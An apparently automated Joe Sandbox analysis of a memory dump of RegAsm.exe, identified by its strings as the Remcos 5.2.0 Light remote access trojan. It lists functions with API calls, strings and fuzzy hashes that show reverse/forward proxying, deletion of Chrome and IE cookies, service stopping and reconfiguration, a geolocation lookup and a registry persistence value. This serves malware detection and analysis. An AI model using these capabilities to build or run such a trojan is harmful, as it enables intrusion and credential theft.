Function 0040C3EC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 152COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040C40A

Strings

StopReverse, xrefs: 0040C517
StopForward, xrefs: 0040C506
StartForward, xrefs: 0040C4E9
StartReverse, xrefs: 0040C4F5
GetDirectListeningPort, xrefs: 0040C528

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Event
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 4201588131-168337528
Opcode ID: 41922c924f5a5da3833a84a67b86ac19aba2cda6983a8387f970e2bc3ff8da04
Instruction ID: 4c107d70a221628ff284c34145cd556a99705f34e20cdd27ed2f6698d2395ea7
Opcode Fuzzy Hash: 41922c924f5a5da3833a84a67b86ac19aba2cda6983a8387f970e2bc3ff8da04
Instruction Fuzzy Hash: 4C418131A147109BC604BB35CD5AA6E3A95AB41714F40463FF905BB2D2EFBC9A09C78F

Function 0043DC80 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0043E3F5,0044A1E5,00000000,00000000,00000000,00000000,00000000), ref: 0043DCC2
__fassign.LIBCMT ref: 0043DD3D
__fassign.LIBCMT ref: 0043DD58
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0043DD7E
WriteFile.KERNEL32(?,00000000,00000000,0043E3F5,00000000,?,?,?,?,?,?,?,?,?,0043E3F5,0044A1E5), ref: 0043DD9D
WriteFile.KERNEL32(?,0044A1E5,00000001,0043E3F5,00000000,?,?,?,?,?,?,?,?,?,0043E3F5,0044A1E5), ref: 0043DDD6

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 35079569acf6452906d3e5629254c2c9cd3208af80c92755be3db5b1c4d45b1b
Instruction ID: 1191330dd9651e550a9c57302bd25a2e4a4b496a4be768e30e66c30c5805dab2
Opcode Fuzzy Hash: 35079569acf6452906d3e5629254c2c9cd3208af80c92755be3db5b1c4d45b1b
Instruction Fuzzy Hash: 8B51B170E00609AFCB10CFA8E881AEEBBB9FF1D300F14512AE555E7291D7749951CB69

Function 004083D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0040D057
Part of subcall function 0040D033: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0040D074
Part of subcall function 0040D033: RegCloseKey.KERNEL32(?), ref: 0040D07F

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 00408457
PathFileExistsA.SHLWAPI(?), ref: 00408464

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 004083EE
Cookies, xrefs: 004083E9
[IE cookies cleared!], xrefs: 004084B1, 004084D1
[IE cookies not found], xrefs: 0040842C

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: b0681254ba728135d1e4a5a31b490442c53c3cedf1b70f8c56d59d094332a86b
Instruction ID: 48a5cd8e34f4168e4ceb4a97fd5a88dfb481768987e4111ae43b07c44258e77f
Opcode Fuzzy Hash: b0681254ba728135d1e4a5a31b490442c53c3cedf1b70f8c56d59d094332a86b
Instruction Fuzzy Hash: 1021C370A0021596CB04FBB1CD5BDEE7728AF55309F80003FB942772C2EE7C5949C699

Function 0044A05D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88791158df2037fbdc827d3f87e260f3fb51ca9734febcded2cc23b58a1a313a
Instruction ID: 3624dff07b2ed831ebec2a5ad87dd854ecd10989a5fe549f38fdbb033019db15
Opcode Fuzzy Hash: 88791158df2037fbdc827d3f87e260f3fb51ca9734febcded2cc23b58a1a313a
Instruction Fuzzy Hash: 8B1127725041147BEB206FB69C0996F7A6CEBCA775F10066FF825D2291DA38C810866A

Function 0040BD3E Relevance: 10.6, APIs: 7, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040BD4B
int.LIBCPMT ref: 0040BD5E

Part of subcall function 00409864: std::_Lockit::_Lockit.LIBCPMT ref: 00409875
Part of subcall function 00409864: std::_Lockit::~_Lockit.LIBCPMT ref: 0040988F

std::locale::_Getfacet.LIBCPMT ref: 0040BD67
std::_Facet_Register.LIBCPMT ref: 0040BD9E
std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDA7
__CxxThrowException@8.LIBVCRUNTIME ref: 0040BDC5
__Init_thread_footer.LIBCMT ref: 0040BE06

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
String ID:
API String ID: 2409581025-0
Opcode ID: c5f783e14f87cefe116d90d775a74b105a54ea3f7e80080ef4d35d6868249059
Instruction ID: f9d61c3bcc2ce2a12a6fed84a452ab5d8f8c1208be56ff46f61e8ed68a895f59
Opcode Fuzzy Hash: c5f783e14f87cefe116d90d775a74b105a54ea3f7e80080ef4d35d6868249059
Instruction Fuzzy Hash: 6221A432A00624DBCB14EBA9E9429DE7768DF45324B60017BF501A73D2EFB99D018BDD

Function 00415128 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00467E5C), ref: 00415131
ShowWindow.USER32(00000000,00000000), ref: 0041514A
SetConsoleOutputCP.KERNEL32(000004E4,?,?,?,00000000,771B0F10), ref: 00415171

Strings

Remcos v, xrefs: 00415198
5.2.0 Light, xrefs: 004151AE
CONOUT$, xrefs: 0041515F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$5.2.0 Light$CONOUT$
API String ID: 2425139147-120711850
Opcode ID: ba906ace53b3a24a910202293975b49cad63cb15e9f8c50223eac9e3bac3fbb8
Instruction ID: dee782cc1d132fa0a2354ebe19e16e3023016d6370a6d64ff70c1a6108a5807a
Opcode Fuzzy Hash: ba906ace53b3a24a910202293975b49cad63cb15e9f8c50223eac9e3bac3fbb8
Instruction Fuzzy Hash: 7F115B72D047006ACA11EF955C06FCBB7A99F92B01F100563FC48BF142D6E6294A86AD

Function 00413A60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00413A88
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00413A9F
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00413AB6
InternetCloseHandle.WININET(00000000), ref: 00413AF6
InternetCloseHandle.WININET(?), ref: 00413AFB

Strings

http://geoplugin.net/json.gp, xrefs: 00413A96

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: a4a511116df9379ae9742600550aba6f639b24d5df1c39e58585f1c9979079ab
Instruction ID: 67adef18b0c7e69bcd0bcbcd75fed6ea5b558425969ab8ef97af71e1a12f261e
Opcode Fuzzy Hash: a4a511116df9379ae9742600550aba6f639b24d5df1c39e58585f1c9979079ab
Instruction Fuzzy Hash: 9E11B135A01214BBCB24ABA6CD49DEF7FBCDF06760F10007EF905B2280DAB85E40C6A4

Function 0044310B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00442E52: _free.LIBCMT ref: 00442E7B

_free.LIBCMT ref: 00443159

Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD

_free.LIBCMT ref: 00443164
_free.LIBCMT ref: 0044316F
_free.LIBCMT ref: 004431C3
_free.LIBCMT ref: 004431CE
_free.LIBCMT ref: 004431D9
_free.LIBCMT ref: 004431E4

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 14f12bd113228a0bc42e7f884a469555986834d255118da641fb1e654957abe0
Instruction ID: a09468fba7be4ed354c4ff5dcfaf30c25cb33cc25251885fb4c19c4112b9c667
Opcode Fuzzy Hash: 14f12bd113228a0bc42e7f884a469555986834d255118da641fb1e654957abe0
Instruction Fuzzy Hash: D3116031951704A6E520FBB2CD07FCB77DCAF04B04F804C2EB39A66053DBB9A5464754

Function 00431C88 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00431C7F,0042EEF4), ref: 00431C96
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00431CA4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00431CBD
SetLastError.KERNEL32(00000000,?,00431C7F,0042EEF4), ref: 00431D0F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 81d3ad3cf813b00a2e0cf9f8b814f9992bd51637a01967386a431731664930c9
Instruction ID: 1b5bb3bab03150c8a1469d7da8b67c39e9eff8abb396b2b9584377dc358b62c2
Opcode Fuzzy Hash: 81d3ad3cf813b00a2e0cf9f8b814f9992bd51637a01967386a431731664930c9
Instruction Fuzzy Hash: E801283230D2215EEB2557B6BC89A672B95EB4B779B20223FF610412F0FF595C02914D

Function 00407F4F Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00407F8B
GetLastError.KERNEL32 ref: 00407F95

Strings

\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00407F56
[Chrome Cookies found, cleared!], xrefs: 00407FBB
[Chrome Cookies not found], xrefs: 00407FAF
UserProfile, xrefs: 00407F5B

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 3f2bb7592ce8f39c0e1a84fd6a07cb408c3f06c05f5a8e02e88e211a228880d5
Instruction ID: 9b808550f0e4f9b834a21a45c6ecabfd6167029ebe00eae2a55e211491ffde40
Opcode Fuzzy Hash: 3f2bb7592ce8f39c0e1a84fd6a07cb408c3f06c05f5a8e02e88e211a228880d5
Instruction Fuzzy Hash: 0A01F231A90106AACA047B75CE1B8AE7B24A912704B50017FE902731D2FD795909C29F

Function 0043AD9B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0043ADC7
__cftoe.LIBCMT ref: 0043ADF9

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: c1793ce132d1af467c427d31e8c1604faa2e7e1347260eb053b15fa2b5159b61
Instruction ID: 03017b7e80f62d50ee97b9a70ef162e4b45f9fae610041ecd781f4744da9c5cc
Opcode Fuzzy Hash: c1793ce132d1af467c427d31e8c1604faa2e7e1347260eb053b15fa2b5159b61
Instruction Fuzzy Hash: 96514E72980205ABDB249B69CC42FAF77A9DF4C324F24121FF85596291DB3CDD20876E

Function 00413398 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133A8
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00412AF7,00000000), ref: 004133BC
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 004133C9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133FE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 00413410
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 00413413

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: 3071766905a9aa70e8b84d46910c906af901398d300ed7046dcbbe556962e6e3
Instruction ID: 5fec4a889dd1482bee852cd790d8d51d36b2b239aed0c5db9861f1eb3ade3fe9
Opcode Fuzzy Hash: 3071766905a9aa70e8b84d46910c906af901398d300ed7046dcbbe556962e6e3
Instruction Fuzzy Hash: FB0126315441197BD6115F295C4AEBB3A5CDB42372F00022AF925931C0CE699F4691AE

Function 0043F13C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0043F1C7
__alldvrm.LIBCMT ref: 0043F3C8
__alldvrm.LIBCMT ref: 0043F3EA

Strings

h^C, xrefs: 0043F158

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID: h^C
API String ID: 1036877536-1919427450
Opcode ID: 8971f6060f7c2517d99c660f883b476c8d3247a326061795d0278329707f7bf7
Instruction ID: fee652c8f8de97b311e1edd3a94b9fd3768e3e6ba78c6f1d0a7032b1fb29f99c
Opcode Fuzzy Hash: 8971f6060f7c2517d99c660f883b476c8d3247a326061795d0278329707f7bf7
Instruction Fuzzy Hash: 7FA14836D003869FEB11CE58C8817AFBBA5EF69314F2441BFD9959B341C23C8949C759

Function 0040C032 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C03F
int.LIBCPMT ref: 0040C052

Part of subcall function 00409864: std::_Lockit::_Lockit.LIBCPMT ref: 00409875
Part of subcall function 00409864: std::_Lockit::~_Lockit.LIBCPMT ref: 0040988F

std::locale::_Getfacet.LIBCPMT ref: 0040C05B
std::_Facet_Register.LIBCPMT ref: 0040C092
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C09B
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C0B9

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 95aeb927a9e446bc9fb2c3204e77c5afd8f4c765209aaec4a41c12be9388a058
Instruction ID: 0b31b2499ed0c1530e6b3d0bed5a99b6867b6c6aa33ff75d33899171708bb31b
Opcode Fuzzy Hash: 95aeb927a9e446bc9fb2c3204e77c5afd8f4c765209aaec4a41c12be9388a058
Instruction Fuzzy Hash: 2A01C432900228D7CB14EFA5D88189E776C9F41714F60426FF515772D1EAB89E05C799

Function 0043C614 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
_free.LIBCMT ref: 0043C64B
_free.LIBCMT ref: 0043C673
SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
_abort.LIBCMT ref: 0043C692

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: e8f541c665fafb93c1da0bbdfeffbbcf2c95524a8b07c2109ffe4dc02d8d7a59
Instruction ID: f51d0cfb58148002e83728663e471f6201f99694adbf6054cd0f5061c7e077da
Opcode Fuzzy Hash: e8f541c665fafb93c1da0bbdfeffbbcf2c95524a8b07c2109ffe4dc02d8d7a59
Instruction Fuzzy Hash: 1CF0497590060026C2112735BC5BF5B27559BDB769F20302FF924A2290EE2CC802425D

Function 004132CA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00412D00,00000000), ref: 004132D9
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00412D00,00000000), ref: 004132ED
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 004132FA
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00412D00,00000000), ref: 00413309
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 0041331B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 0041331E

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 4418c0144d096111ae53b4e3f1717c1deceb3ca9990d3752d48c4df148a3b705
Instruction ID: b2c5ceb5835a0e52a8200594826144103f446a1ddf7c0e9e6865c673d70b3852
Opcode Fuzzy Hash: 4418c0144d096111ae53b4e3f1717c1deceb3ca9990d3752d48c4df148a3b705
Instruction Fuzzy Hash: D8F0F6759011187BD320AF659C4ADBF3B6CDB86356F40002AFE0997141DF388E4696F9

Function 00413331 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00412C85,00000000), ref: 00413340
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00412C85,00000000), ref: 00413354
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413361
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00412C85,00000000), ref: 00413370
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413382
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413385

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: f13c7401ebe7a898861ac91539950dc645e57731a144732d60cdc4e431a17a9e
Instruction ID: 26a4b3f833e9e877c3d8a59b275bd20eef789fc4ef1e4340bdc2f8a59b459027
Opcode Fuzzy Hash: f13c7401ebe7a898861ac91539950dc645e57731a144732d60cdc4e431a17a9e
Instruction Fuzzy Hash: 77F0F6759411187FD3216F659C49DBF3B6CDB86396F00006AFE0997140DF388E4695F9

Function 00415A14 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 00415A60
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 00415A7B
GetLastError.KERNEL32 ref: 00415A85

Strings

MsgWindowClass, xrefs: 00415A2B
0, xrefs: 00415A30

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 171986d441cc0fdba3aa014d35ecb3b22f7763cc9b94a58783fd8344a93d0701
Instruction ID: f63745ccf0cf2e059edbdb5c197b6e0c42188d60e7481a6116dcff7c28758ec6
Opcode Fuzzy Hash: 171986d441cc0fdba3aa014d35ecb3b22f7763cc9b94a58783fd8344a93d0701
Instruction Fuzzy Hash: 9A0129B5D0021DAFDB00DFD59CC49EFBBBCFA49395F40453AF814A6240E77449088BA4

Function 0040D2A7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0040D2B6
RegSetValueExW.ADVAPI32(?,pth_unenc,00000000,00000001,00000000,00000000,00467F30,?,?,0040A737,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040D2E6
RegCloseKey.ADVAPI32(?,?,?,0040A737,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040D2F1

Strings

pth_unenc, xrefs: 0040D2DE
5.2.0 Light, xrefs: 0040D2AB

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: 5.2.0 Light$pth_unenc
API String ID: 1818849710-3605515537
Opcode ID: a430c6edf17f74098992ac9154db1f546465859e2b6c872928652b55fa7155e1
Instruction ID: 2e74f0484c559c564727cfda02f69fa124803a4f800e4363bc650dd93a751580
Opcode Fuzzy Hash: a430c6edf17f74098992ac9154db1f546465859e2b6c872928652b55fa7155e1
Instruction Fuzzy Hash: 78F0F671940218BBDB009FA1ED46FEA372CEF40745F10417AFD01A7191EA355E08D654

Function 00409743 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040974E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040978D

Part of subcall function 0042CF7D: _Yarn.LIBCPMT ref: 0042CF9C
Part of subcall function 0042CF7D: _Yarn.LIBCPMT ref: 0042CFC0

std::bad_exception::bad_exception.LIBCMT ref: 004097A5
__CxxThrowException@8.LIBVCRUNTIME ref: 004097B3

Strings

bad locale name, xrefs: 0040979D

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 3706160523-1405518554
Opcode ID: 13fed22de21f81b2a35b0cb37550356cb7eb9b2a9533165e17dac1c679de04f0
Instruction ID: 9d137025840e00eb06f5ff8b3a23299090e48e33d1ea126e93cf13c7e88e76db
Opcode Fuzzy Hash: 13fed22de21f81b2a35b0cb37550356cb7eb9b2a9533165e17dac1c679de04f0
Instruction Fuzzy Hash: 92F081326403146BC324FB62F952ADA73649F20314F50493FB406220D2AF78BA1DCA8A

Function 00438A08 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004389B9,00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002), ref: 00438A28
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00438A3B
FreeLibrary.KERNEL32(00000000,?,?,?,004389B9,00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000), ref: 00438A5E

Strings

CorExitProcess, xrefs: 00438A33
mscoree.dll, xrefs: 00438A21

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ddf01c5aeed1f8872b046582afe7d0198474f425bac7e19766fad1f5c80fe2ec
Instruction ID: d0d7485eb252394449f42fd03d40615a4a99cb877cdef310b87857d9b9159d1f
Opcode Fuzzy Hash: ddf01c5aeed1f8872b046582afe7d0198474f425bac7e19766fad1f5c80fe2ec
Instruction Fuzzy Hash: 03F06834A01218BBDB11AF91DC49B9EBFB4EF04715F10406AFD05A2260DF745E45CB98

Function 00401EFF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00401F3D
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C9F,00000001), ref: 00401F49
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00401C9F,00000001), ref: 00401F54
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401C9F,00000001), ref: 00401F5D

Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6

Strings

KeepAlive | Disabled, xrefs: 00401F16

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
